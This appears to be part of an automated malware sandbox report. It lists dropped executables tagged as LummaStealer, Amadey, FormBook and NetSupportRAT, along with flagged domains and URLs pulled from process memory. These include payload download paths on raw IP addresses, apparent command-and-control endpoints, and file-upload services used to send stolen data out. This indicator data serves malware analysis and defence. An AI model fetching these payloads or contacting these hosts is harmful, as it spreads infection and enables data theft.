                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exe67%ReversingLabsWin32.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe67%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe88%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exe18%ReversingLabsWin32.Dropper.Generic
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe68%ReversingLabsWin32.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe75%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe54%ReversingLabsWin32.Spyware.Lummastealer
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[3].exe28%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe67%ReversingLabsWin32.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe53%ReversingLabsWin32.PUA.NetSupportRAT
                                C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe68%ReversingLabsWin32.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe75%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exe67%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                                C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exe54%ReversingLabsWin32.Spyware.Lummastealer
                                C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exe88%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exe28%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exe18%ReversingLabsWin32.Dropper.Generic
                                C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe54%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\1017917001\7423465717.exe81%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\1017918001\d2256ee69b.exe68%ReversingLabsWin32.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Temp\1017919001\b8dc7af2d8.exe75%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\1017921001\85070a414c.exe54%ReversingLabsWin32.Spyware.Lummastealer
                                C:\Users\user\AppData\Local\Temp\_MEI51602\VCRUNTIME140.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI51602\_bz2.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI51602\_ctypes.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI51602\_decimal.pyd3%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                No Antivirus matches

                                Domains and IPs

                                Contacted Domains

                                No contacted domains info

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                sordid-snaked.cyoutrue
                                  deafeninggeh.biztrue
                                    effecterectz.xyztrue
                                      debonairnukk.xyztrue

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtab8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          https://github.com/Blank-c/BlankOBFD1UL0FG.exe, 00000006.00000003.2479764407.000001FA2E279000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479979296.000001FA2E83D000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2480587995.000001FA2E348000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479451301.000001FA2E348000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479664796.000001FA2E254000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2481335811.000001FA2E26A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2480317541.000001FA2E251000.00000004.00000020.00020000.00000000.sdmpfalse
                                            http://%s/testpage.htmwininet.dllFuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpfalse
                                              http://31.41.244.11/files/7781867830/D1UL0FG.exeshqos.dllskotes.exe, 00000003.00000002.7284592983.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://duckduckgo.com/ac/?q=8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    http://geo.netsupportsoftware.com/location/loca.aspFuturreApp.exe, 00000055.00000002.7280001721.0000000001011000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            http://%s/testpage.htmFuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpfalse
                                                              https://www.gstatic.cn/recaptcha/8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                https://python.org/dev/peps/pep-0263/D1UL0FG.exe, 00000006.00000002.3005171596.00007FF8A8E0F000.00000040.00000001.01000000.0000000B.sdmpfalse
                                                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    http://ocsp.sectigorD1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      https://www.leboncoin.fr/D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        http://31.41.244.11/files/x3team/random.exeskotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          http://www.valvesoftware.com/legal.htm8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            https://www.youtube.com8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://lev-tolstoi.com/apih0Y8ZVMneG.exe, 00000054.00000003.3041726825.0000000001363000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3045357571.0000000001365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                https://api.anonfiles.com/uploadD1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  https://api.libertyreserve.com/beta/xml/transfer.aspxskotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.0000000001402000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://www.msn.comD1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ED50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.2798190076.0000028A95663000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2733086227.0000021FA472A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2733086227.0000021FA45E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2645286273.0000021F95ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af68ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            https://discord.com/api/v9/users/D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963D1UL0FG.exe, 00000006.00000002.2996941109.000001FA2E830000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    https://deafeninggeh.biz/e8ZVMneG.exe, 00000054.00000003.2712485974.0000000001308000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://diffuculttan.xyz/api8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://pancakedipyps.click/.d0ef52de9f.exe, 0000005F.00000003.2934892594.00000000012D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://s.ytimg.com;8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.2659507683.0000028A855F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2645286273.0000021F94571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=18ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameD1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyD1UL0FG.exe, 00000006.00000002.2997186323.000001FA2E940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      http://31.41.244.11/files/1293295511/UZAj8wc.exeskotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://lev-tolstoi.com/rtner.-K8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          https://steamcommunity.com/profiles/765611997243319008ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                http://31.41.244.11/files/karl/random.exeskotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    https://wrathful-jammy.cyou/8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerD1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        https://www.amazon.com/D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          https://contoso.com/Iconpowershell.exe, 00000037.00000002.2645286273.0000021F95ED9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            https://pancakedipyps.click/apiPd0ef52de9f.exe, 0000005F.00000003.3051592972.00000000012CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://httpbin.org/D1UL0FG.exe, 00000006.00000003.2537129441.000001FA2DFF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sD1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    http://ocsp.rootca1.amazontrust.com0:8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlD1UL0FG.exe, 00000006.00000003.2483191115.000001FA2E348000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleD1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesD1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            http://127.0.0.1m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmpfalse
                                                                                                                                                              https://immureprech.biz/api8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.00000000012D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://www.ecosia.org/newtab/8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://www.symauth.com/cps0(m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://immureprech.biz/apif8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.00000000012D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://lv.queniujq.cn8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/8ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://www.youtube.com/8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://31.41.244.11/files/martin/random.exeskotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://lev-tolstoi.com/u/8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://MD8.mozilla.org/1/mD1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://lev-tolstoi.com/eK8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://www.bbc.co.uk/D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://185.215.113.16/off/random.exe/skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://lev-tolstoi.com/api8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3045357571.0000000001365000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://api.gofile.io/getServerr=rD1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://bugzilla.moD1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://tools.ietf.org/html/rfc6125#section-6.4.3D1UL0FG.exe, 00000006.00000002.2997186323.000001FA2E940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://www.symauth.com/rpa00m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://31.41.244.11/files/geopoxid/random.exeskotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zskotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.2659507683.0000028A8581A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://www.google.com/recaptcha/8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://checkout.steampowered.com/8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLD1UL0FG.exe, 00000006.00000003.2562812810.000001FA2E5A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://31.41.244.11/files/unique1/random.exeskotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          http://185.215.113.43/Zu7JuNko/index.phpdedskotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://google.com/mailD1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74778ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpfalse
